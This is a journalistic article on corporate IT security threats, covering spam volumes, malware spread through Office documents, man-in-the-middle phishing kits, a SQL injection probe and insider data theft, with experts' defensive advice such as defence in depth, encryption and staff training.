Get smart to counter hacker attacks

Sophisticated threats to corporate security can be difficult to combat

Hackers are getting more clever and more greedy. Staff are being bribed to disclose customer information, and the internet is made up of a growing army of hijacked PCs that spew out an endless flood of spam, phishing scams and malware on to an ill-defended world. It is not a pretty picture.

Reading through the security companies' latest reports is enough to make you turn off the computers, shut down the networks and go back to quill pens. Well, almost.

The security companies want you to buy their products, of course, and therefore have an interest in painting the worst of pictures, but there is enough evidence to show that the situation is getting worse.

Take spam, for instance. According to security company SoftScan, 90.3% of e-mail was spam during February, and on one Sunday the level reached 96.22%. And security company Postini said spam reached 94% last December, up by 114% on the previous December.

Apart from all that wasted bandwidth, you have the problem of filtering out the good from the bad and the ugly. That takes money and processing power, and in order to keep out most of the dross, you inevitably end up quarantining valid messages. In the process, the e-mail system that has served you well for the past couple of decades starts to be more troublesome to manage and use.

The inconvenience is the least of the problems, though. Spam increasingly comes with a vicious payload, designed to take control of the target computer, and also to steal information from it.

For example, last December the Happy New Year worm drove the daily volume of e-mail-borne viruses on the internet up by a factor of 20 on New Year's weekend. Also known as Nuwar and Mixor, the worm used social engineering techniques designed to exploit people's expectations of legitimate New Year's postcards and greetings from friends and family.

Serious professionals might not fall for that scam, but what about opening an innocent-looking Word document? According to Ollie Whitehouse, a threat researcher at Symantec, hackers have been forced to become more cunning as users get smarter.

He said Symantec detected five zero-day exploits released against Microsoft Office in the period from July to December 2006. For this attack method, hackers use unpatched vulnerabilities to lure users into opening a word processing document, presentation or spreadsheet.

This triggers malicious code, which downloads a back door or Trojan dropper on to the machine, which can then dial out to get a more feature-rich piece of malicious code.

"It appears to be an effective way for these malicious individuals to compromise the machines of people who would regard themselves as security-aware. The hacker then uses it to gain access to personal information, and the machine can be used in a botnet," said Whitehouse.

Phishing attacks also show no sign of going away. Having started by targeting the banks, phishers now go for any company with a web presence that holds customer information.

Paypal, Amazon and eBay have become obvious targets, and Virgin Media was a recent victim, with a spoofed e-mail asking customers to re-confirm their account details.

But phishers too are getting more cunning, according to Mikko Hyppönen, chief technologist at security company F-Secure. He is especially concerned about the rise of man-in-the-middle attacks.

"We saw the first real man in the middle attacks about 11 months ago, one targeting Paypal, the other targeting a big US bank," he says.

"Last week we found five separate kits for man-in-the-middle attacks, targeting sites such as Amazon."

He describes one recent attack aimed at a well-known online retailer: "You get an e-mail asking you to clarify something about your account. You follow a link and end up on a page that looks just like the retailer's site. It asks you for your user name and password, which it sends off to the bad boys just as in traditional scams.

"But it also uses the user name and password to log into the real site. It goes to your profile page and it downloads all the information about you. It then creates a new page, which asks the user to 'confirm' their details."

Here is the clever bit. Having "legitimate" access to the user's account, it can present a whole page of valid information to reassure the user, even a list of their payment details with just the last four digits of the credit card showing.

In a devious trick of reverse psychology, it then asks the user to prove who they are by filling in the blanked-out digits of the credit card number.

Worst of all, Hyppönen says, the attacks are now becoming available as toolkits on the internet, so everyone can have a try. And researchers from security company RSA have recently discovered a new universal man-in-the-middle phishing kit, which allows the would-be fraudster to create a fraudulent URL via a simple and user-friendly online interface.

This means that just about any company with an e-commerce presence could become a target of phishing scams.

Apart from constantly reminding their customers of the dangers of such attacks, e-commerce companies have little option but to subscribe to a service. An example is RSA's FraudactionSM anti-phishing and anti-pharming service, which operates a broad monitoring and detection network to block rogue sites quickly.

Of course, it is not just the blunderbuss effect of spam and phishing that companies need to worry about. Most security researchers report that hackers are still using crafted attacks to get into companies to steal information, sometimes sponsored by rivals looking for competitive information, or even by foreign governments in some cases.

Hyppönen says his company investigated a handful of such cases last year, but admits they could be the tip of an otherwise undiscovered iceberg.

One example comes from Secerno, which specialises in database protection. Chief executive Paul Davie says one of his clients, an online travel company, was recently visited by a hacker looking for crucial information.

"We put systems in before Christmas and reviewed the progress in January, going through a couple of days' traffic. Out of hundreds of thousands of instructions, there was just one that contained some code that sought to find out, using simple bit-mapping within SQL injection, which standard management accounts the company had set up as system administrator accounts," says Davie.

"It was beautifully crafted. It was effectively a scouting instruction, designed to find out where the vulnerabilities lay in the system. We passed it round to some penetration testers in the industry. They had not seen this code before there was no way there was a signature looking for it.

"They could find out which of 16 possible administrator accounts were being used. The owner of the system nearly fell off his chair when we explained what it could have done."

The Secerno system had blocked the attack because it checks for anomalous behaviour, however, a signature-based defence would not have picked it up.

However, external attacks still only account for about 20% of the dangers facing system owners. The rest come from insiders with proper authentication and passwords.

Offshore call centres in India received bad publicity last year when it was discovered that personal data was being sold by workers. But the situation is no better in places like Glasgow, where local police estimate one in 10 call centres has been infiltrated by criminal gangs, or in Newcastle, where call centre staff are regularly accosted by crooks with wads of cash trying to buy personal information.

A company's own staff may pose equal danger, if only by accident. For instance, the Nationwide employee who had his laptop stolen last year from his home could hardly have foreseen the £980,000 fine his employer would have to pay, on account of the personal information that was stored on the machine.

In that particular case, encrypting the files would have adequately secured the data, a solution that Nationwide has since adopted.

New research from content security company Clearswift flags further potential problems from younger staff who have grown up with the internet and who have moved seamlessly into Web 2.0.

A YouGov survey of 1,000 companies found that workers between the ages of 18 and 29 regarded regular visits to YouTube, MySpace and blogs as a natural part of their working day. Twenty-seven per cent admitted spending three or more hours on such sites at work, and 42% admitted to discussing work-related issues on the sites.

Companies need to maintain a fine balance between harnessing new technologies for business benefits and maintaining security, Ian Bowles, chief operating officer at Clearswift says. And most workers now expect some level of personal e-mail and internet access as a right. A blanket ban would be unacceptable in most organisations.

So what does a company do to prevent this onslaught on its security, both from the outside and within? The answer is to go back to basics.

The general consensus among security experts is to assess risks and manage them through a combination of people, process and technology.

Apply defence in depth, from the basic anti-virus and anti-spam functions (which could come as a service) to the more sophisticated content filtering and behavioural monitoring, in order to control staff activity. And patch vulnerabilities quickly where they expose a risk.

It is also important to apply data encryption to sensitive data so that a stolen laptop or Blackberry will not be a disaster. But also make sure you manage the encryption keys so that data is accessible when you need it.

And finally make sure you train staff to be security-aware.

"If you have a staff culture where people have been made aware of security and have been told about social engineering exploits, for instance, then they will avoid a lot of the problems," said Mark Jones, a partner in charge of security and risk at Atos Origin.

"It does not need a lot of expense or training, but it can lift security cost-effectively across the whole organisation."

TJX hack the biggest in history >>

Certification to close door on hackers >>

Hackers broaden cross-site attacks >>

David Lacey’s security blog >>
The latest ideas, best practices, and business issues associated with managing security

Stuart King’s risk management blog >>
Dealing with the operational challenges of information security and risk management

Comment on this article: [email protected]


Read more on IT risk management